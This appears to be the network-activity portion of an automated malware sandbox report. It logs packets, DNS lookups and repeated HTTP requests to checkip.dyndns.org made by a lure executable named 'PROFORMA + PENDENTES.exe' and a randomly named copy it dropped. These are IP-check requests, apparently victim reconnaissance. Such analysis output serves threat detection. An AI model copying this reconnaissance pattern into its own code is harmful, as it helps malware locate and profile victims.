Nov 18, 2024 18:18:54.845489025 CET	49734	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.845499992 CET	443	49734	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.891309023 CET	49731	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:55.139745951 CET	80	49732	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:55.141549110 CET	49735	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.141611099 CET	443	49735	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.141993999 CET	49735	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.141994953 CET	49735	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.142030001 CET	443	49735	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.190673113 CET	49732	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:55.520224094 CET	443	49734	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.560265064 CET	49734	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.560300112 CET	443	49734	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.713298082 CET	443	49734	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.713377953 CET	443	49734	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.713438034 CET	49734	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.713890076 CET	49734	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.720604897 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:55.726142883 CET	80	49736	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:55.730412006 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:55.732147932 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:55.736977100 CET	80	49736	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:55.810237885 CET	443	49735	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:55.819032907 CET	49735	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:55.819058895 CET	443	49735	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:56.968770027 CET	443	49735	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:56.968852997 CET	443	49735	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:56.969085932 CET	80	49736	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:56.969280958 CET	49735	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:56.969280958 CET	49735	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:56.969322920 CET	80	49736	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:56.969440937 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:56.969469070 CET	80	49736	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:56.969552040 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:56.971194983 CET	49737	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:56.971234083 CET	443	49737	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:56.971410990 CET	49737	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:56.971798897 CET	49737	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:56.971810102 CET	443	49737	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:57.677867889 CET	443	49737	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:57.713079929 CET	49737	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:57.713105917 CET	443	49737	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:57.853862047 CET	49732	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.853892088 CET	49713	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.885195017 CET	443	49737	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:57.885276079 CET	443	49737	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:57.885327101 CET	49737	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:57.886758089 CET	49737	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:57.940993071 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.946355104 CET	80	49736	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:57.946409941 CET	49736	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.946719885 CET	49738	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.951538086 CET	80	49738	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:57.951617956 CET	49738	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.955004930 CET	49738	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:57.959901094 CET	80	49738	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:58.976974010 CET	80	49738	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:58.978579998 CET	49739	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:58.978615999 CET	443	49739	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:58.978888988 CET	49739	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:58.979180098 CET	49739	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:58.979193926 CET	443	49739	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:59.031991959 CET	49738	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:59.646847010 CET	443	49739	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:59.649959087 CET	49739	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:59.649995089 CET	443	49739	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:59.810256004 CET	443	49739	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:59.810415030 CET	443	49739	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:59.810472965 CET	49739	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:59.811013937 CET	49739	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:59.822761059 CET	49740	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:59.822868109 CET	49738	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:59.827792883 CET	80	49740	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:59.827910900 CET	49740	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:59.828233004 CET	80	49738	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:59.828310013 CET	49738	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:59.830641985 CET	49740	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:59.835668087 CET	80	49740	158.101.44.242	192.168.2.8
Nov 18, 2024 18:19:00.469577074 CET	80	49740	158.101.44.242	192.168.2.8
Nov 18, 2024 18:19:00.485270023 CET	49741	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:00.485323906 CET	443	49741	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:00.485394001 CET	49741	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:00.485915899 CET	49741	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:00.485928059 CET	443	49741	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:00.516302109 CET	49740	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:01.142963886 CET	443	49741	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:01.145138979 CET	49741	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:01.145174026 CET	443	49741	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:01.307156086 CET	443	49741	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:01.307219028 CET	443	49741	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:01.307326078 CET	49741	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:01.307852030 CET	49741	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:01.311011076 CET	49740	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:01.312194109 CET	49742	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:01.316521883 CET	80	49740	158.101.44.242	192.168.2.8
Nov 18, 2024 18:19:01.316617012 CET	49740	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:01.317114115 CET	80	49742	158.101.44.242	192.168.2.8
Nov 18, 2024 18:19:01.317202091 CET	49742	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:01.317320108 CET	49742	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:01.322105885 CET	80	49742	158.101.44.242	192.168.2.8
Nov 18, 2024 18:19:02.925770998 CET	80	49742	158.101.44.242	192.168.2.8
Nov 18, 2024 18:19:02.969506025 CET	49742	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:03.131202936 CET	49743	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:03.131369114 CET	443	49743	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:03.131480932 CET	49743	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:03.132276058 CET	49743	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:03.132308960 CET	443	49743	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:03.805622101 CET	443	49743	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:03.807359934 CET	49743	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:03.807439089 CET	443	49743	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:03.984713078 CET	443	49743	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:03.984889984 CET	443	49743	188.114.97.3	192.168.2.8
Nov 18, 2024 18:19:03.984972000 CET	49743	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:03.985737085 CET	49743	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:19:04.130192995 CET	49731	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:19:04.130342960 CET	49742	80	192.168.2.8	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:18:43.790225983 CET	51858	53	192.168.2.8	1.1.1.1
Nov 18, 2024 18:18:43.799127102 CET	53	51858	1.1.1.1	192.168.2.8
Nov 18, 2024 18:18:44.697206020 CET	64465	53	192.168.2.8	1.1.1.1
Nov 18, 2024 18:18:44.704750061 CET	53	64465	1.1.1.1	192.168.2.8
Nov 18, 2024 18:19:08.727518082 CET	53	61960	162.159.36.2	192.168.2.8
Nov 18, 2024 18:19:09.400460005 CET	53624	53	192.168.2.8	1.1.1.1
Nov 18, 2024 18:19:09.408044100 CET	53	53624	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 18:18:43.790225983 CET	192.168.2.8	1.1.1.1	0xb9e8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:44.697206020 CET	192.168.2.8	1.1.1.1	0x1dee	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:19:09.400460005 CET	192.168.2.8	1.1.1.1	0x5149	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 18:18:43.799127102 CET	1.1.1.1	192.168.2.8	0xb9e8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 18:18:43.799127102 CET	1.1.1.1	192.168.2.8	0xb9e8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:43.799127102 CET	1.1.1.1	192.168.2.8	0xb9e8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:43.799127102 CET	1.1.1.1	192.168.2.8	0xb9e8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:43.799127102 CET	1.1.1.1	192.168.2.8	0xb9e8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:43.799127102 CET	1.1.1.1	192.168.2.8	0xb9e8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:44.704750061 CET	1.1.1.1	192.168.2.8	0x1dee	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:18:44.704750061 CET	1.1.1.1	192.168.2.8	0x1dee	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:19:09.408044100 CET	1.1.1.1	192.168.2.8	0x5149	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:43.820655107 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:44.475091934 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:44 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 59635b504faa5f32bbef4d9f4c043bd8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:18:44.486680031 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:44.635963917 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:44 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c510cbce5be038d340430abf137ab5cb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:18:46.025723934 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:46.175990105 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:46 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c5c95bdf61da83897f19b8067fc834d5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:47.011665106 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:47.658689976 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:47 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 88008307a45299c653fecfd2118f6486 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:48.522344112 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:49.162628889 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:49 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 73a9f247c924c3d0ab1c46e3c38c1b37 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49717	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:49.819799900 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:50.456991911 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:50 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7a4cfd31bab2d1885db1445144f83b3c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:18:50.461107969 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:50.607223988 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:50 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 430e890b77f2aecfc2d611a2ae37df82 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:18:51.547415018 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:51.694720030 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:51 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 20ee997077f340b3ccd55390cd3a24bf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49718	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:50.000060081 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:50.657566071 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:50 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: be8a03a05d1640fb63228012d406f5c1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:51.513005972 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:52.162961006 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:52 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c46e72bf224359e240cd25447b1c94f0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49724	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:52.726176977 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:53.412066936 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: af6f8e36e52664b5f8dfc299b4fcf511 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:52.990466118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:53.654767036 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ddd9eaecf8f5509cbb2dd7c952778468 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49731	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:54.194538116 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:18:54.843444109 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:54 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: df3a9545a51528a6095d35c7550061ed Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

